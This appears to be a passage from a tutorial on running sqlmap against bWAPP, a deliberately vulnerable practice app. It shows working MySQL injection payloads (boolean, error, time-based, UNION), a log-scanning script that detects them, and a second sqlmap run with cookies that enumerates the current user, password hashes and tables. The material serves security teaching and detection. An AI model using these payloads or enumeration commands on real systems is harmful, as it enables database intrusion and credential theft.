[18:14:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[18:14:04] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[18:14:04] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[18:14:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[18:14:09] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[18:14:09] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:14:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[18:14:25] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:14:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[18:14:36] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[18:14:41] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[18:14:47] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:14:52] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[18:14:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:15:03] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:15:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:15:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:15:20] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:15:26] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:15:31] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:15:43] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[18:15:46] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:15:50] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[18:15:50] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[18:15:50] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[18:15:50] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[18:15:50] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[18:15:50] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[18:15:50] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[18:15:50] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[18:15:50] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[18:15:51] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[18:15:51] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[18:15:51] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[18:15:51] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[18:15:52] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[18:15:52] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[18:15:52] [INFO] testing 'MySQL inline queries'
[18:15:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:15:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:15:59] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:16:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:16:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[18:16:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[18:16:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:16:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[18:16:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[18:16:30] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[18:16:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[18:16:39] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[18:16:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[18:16:46] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[18:16:49] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[18:16:55] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[18:17:01] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[18:17:06] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[18:17:11] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[18:17:15] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[18:17:18] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[18:17:25] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[18:17:29] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[18:17:34] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[18:17:38] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[18:17:43] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[18:17:46] [INFO] testing 'MySQL AND time-based blind (ELT)'
[18:17:52] [INFO] testing 'MySQL OR time-based blind (ELT)'
[18:17:57] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[18:18:01] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[18:18:04] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:18:08] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:18:10] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[18:18:10] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[18:18:11] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[18:18:11] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[18:18:16] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[18:18:16] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[18:18:16] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[18:18:16] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[18:18:16] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[18:20:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:20:25] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[18:20:25] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[18:20:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:21:10] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[18:21:49] [WARNING] GET parameter 'action' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3926 HTTP(s) requests:
---
Parameter: title (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: title=Iron Man' OR NOT 5557=5557#&action=search

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: title=Iron Man' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170707871,(SELECT (ELT(9118=9118,1))),0x71787a6b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- DJGx&action=search

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=Iron Man' AND (SELECT 8291 FROM (SELECT(SLEEP(5)))gNKi)-- NqMd&action=search

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: title=Iron Man' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707871,0x6a47494c595a48466c44707668676a466a624c61785854647069434e446946536d55717850476941,0x71787a6b71),NULL#&action=search
[18:21:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
[18:21:49] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\8.142.109.131'

[*] ending @ 18:21:49 /2022-06-16/
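The injection points sqlmap reported above are also exactly what a defender should be looking for in the web server's access log. The following Python script is an added example, not part of the original post and not sqlmap's own code: it parses Apache combined-format log lines, URL-decodes the request URI repeatedly (so a double-encoded quote is still seen in clear), and tags each request with the technique whose payload shape it matches, using the boolean-based, error-based, time-based and UNION payloads shown in the output above; it also flags sqlmap's default User-Agent, which begins with "sqlmap/". The log lines, the client IP 192.0.2.10 and the browser User-Agent strings are constructed samples.

```python
"""Flag sqlmap-style SQL injection probes in web access logs.

Added example for this page; not part of the original post and not sqlmap's
own code. The signatures mirror the four techniques sqlmap reported for the
'title' parameter (boolean-based blind, error-based, time-based blind, UNION
query). The log lines and the client IP 192.0.2.10 are constructed samples in
Apache "combined" log format.
"""
import re
from urllib.parse import unquote_plus

# Apache/Nginx "combined" log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# (technique, pattern): each pattern is built from the payload shapes in the
# sqlmap output on this page; matching is done on the URL-decoded URI.
SIGNATURES = [
    # ' OR NOT 5557=5557#   /   ' AND 1234=1234
    ("boolean-based blind", re.compile(r"'\s*(?:or|and)\s+(?:not\s+)?\d+\s*=\s*\d+", re.I)),
    # ELT(9118=9118,1) inside the BIGINT overflow; EXTRACTVALUE() is another MySQL error-based primitive
    ("error-based", re.compile(r"\b(?:elt\s*\(\s*\d+\s*=\s*\d+|extractvalue\s*\()", re.I)),
    # SLEEP(5) / BENCHMARK(...)
    ("time-based blind", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    # UNION ALL SELECT NULL,NULL,...
    ("UNION query", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]

SQLMAP_UA_PREFIX = "sqlmap/"  # sqlmap's default User-Agent; hidden by --random-agent


def decode_uri(uri, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are seen in clear."""
    for _ in range(rounds):
        decoded = unquote_plus(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def classify(uri):
    """Return the injection techniques whose signature matches the decoded URI."""
    decoded = decode_uri(uri)
    return [name for name, pattern in SIGNATURES if pattern.search(decoded)]


def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(lines):
    """One finding per request that carries an injection signature or the sqlmap User-Agent."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparsable line; a real pipeline would count these separately
        techniques = classify(rec["uri"])
        sqlmap_ua = rec["agent"].lower().startswith(SQLMAP_UA_PREFIX)
        if techniques or sqlmap_ua:
            findings.append({
                "ip": rec["ip"], "time": rec["time"], "uri": rec["uri"],
                "techniques": techniques, "sqlmap_ua": sqlmap_ua,
            })
    return findings


def summarize(findings):
    """Flagged-request count per client IP; an sqlmap run is noisy (thousands of requests)."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


# Constructed sample log. Payloads are URL-encoded as a client would send them; the
# UNION line has its quote double-encoded (%2527) to exercise the repeated decoding.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Jun/2022:18:10:01 +0800] "GET /sqli_1.php?title=Iron+Man&action=search HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/101.0"',
    '192.0.2.10 - - [16/Jun/2022:18:10:02 +0800] "GET /sqli_1.php?title=Iron+Man&action=search HTTP/1.1" 200 1532 "-" "sqlmap/1.6.6#pip (https://sqlmap.org)"',
    '192.0.2.10 - - [16/Jun/2022:18:10:03 +0800] "GET /sqli_1.php?title=Iron+Man%27+OR+NOT+5557%3D5557%23&action=search HTTP/1.1" 200 1532 "-" "sqlmap/1.6.6#pip (https://sqlmap.org)"',
    '192.0.2.10 - - [16/Jun/2022:18:10:09 +0800] "GET /sqli_1.php?title=Iron+Man%27+AND+%28SELECT+8291+FROM+%28SELECT%28SLEEP%285%29%29%29gNKi%29--+NqMd&action=search HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/102.0"',
    '192.0.2.10 - - [16/Jun/2022:18:10:10 +0800] "GET /sqli_1.php?title=Iron+Man%2527+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x7170707871%2C0x6a47494c%2C0x71787a6b71%29%2CNULL%23&action=search HTTP/1.1" 200 1611 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/102.0"',
    '192.0.2.10 - - [16/Jun/2022:18:10:11 +0800] "GET /sqli_1.php?title=Iron+Man%27+AND+%28SELECT+2%2A%28IF%28%28SELECT+%2A+FROM+%28SELECT+CONCAT%280x7170707871%2C%28SELECT+%28ELT%289118%3D9118%2C1%29%29%29%2C0x71787a6b71%2C0x78%29%29s%29%2C+8446744073709551610%2C+8446744073709551610%29%29%29--+DJGx&action=search HTTP/1.1" 500 774 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/102.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["time"], f["techniques"], "sqlmap-ua" if f["sqlmap_ua"] else "")
    print(summarize(scan(SAMPLE_LOG)))
```

Signature matching is a floor, not a detection strategy on its own: --random-agent removes the User-Agent tell, tamper scripts rewrite the payloads, and the boolean and UNION patterns here are deliberately narrow to avoid false positives on legitimate search text. The per-IP count from summarize() is the more robust signal; the run above needed 3926 HTTP requests against a single parameter, and no ordinary user produces that.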

sqlmap usage example 3

Description:

1. Scan the bWAPP Login injection point with the session cookie attached (--cookie), select the mysql database (-D mysql), retrieve the DBMS current user (--current-user), retrieve the DBMS current database (--current-db), enumerate the DBMS user password hashes (--passwords) and enumerate the tables of that database (--tables).

2. If this injection point has been scanned before, sqlmap remembers it: on the next run it automatically reads the stored results and reuses the injection request, which shortens the scan.

$ sqlmap -u"http://8.142.109.131:8080/sqli_1.php?title=Iron+Man&action=search" -D "mysql" --cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0" --passwords -v 0 --current-user --current-db --tables

Output of the scan:

$ sqlmap -u"http://8.142.109.131:8080/sqli_1.php?title=Iron+Man&action=search" -D "mysql" --cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0" --passwords -v 0 --current-user --current-db --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.6#pip}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:23:08 /2022-06-17/

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: title=Iron Man' OR NOT 5557=5557#&action=search

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: title=Iron Man' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170707871,(SELECT (ELT(9118=9118,1))),0x71787a6b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- DJGx&action=search

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=Iron Man' AND (SELECT 8291 FROM (SELECT(SLEEP(5)))gNKi)-- NqMd&action=search

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: title=Iron Man' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707871,0x6a47494c595a48466c44707668676a466a624c61785854647069434e446946536d55717850476941,0x71787a6b71),NULL#&action=search
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
current user: 'root@localhost'
current database: 'bWAPP'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
database management system users password hashes:
[*] admin [1]:
    password hash: NULL
[*] root [1]:
    password hash: NULL

Database: mysql
[24 tables]
+---------------------------+
| user                      |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| ndb_binlog_index          |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| servers                   |
| slow_log                  |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
+---------------------------+

[*] ending @ 12:24:05 /2022-06-17/

Feel free to follow my subscription account, where I regularly share articles on testing; questions and discussion are welcome!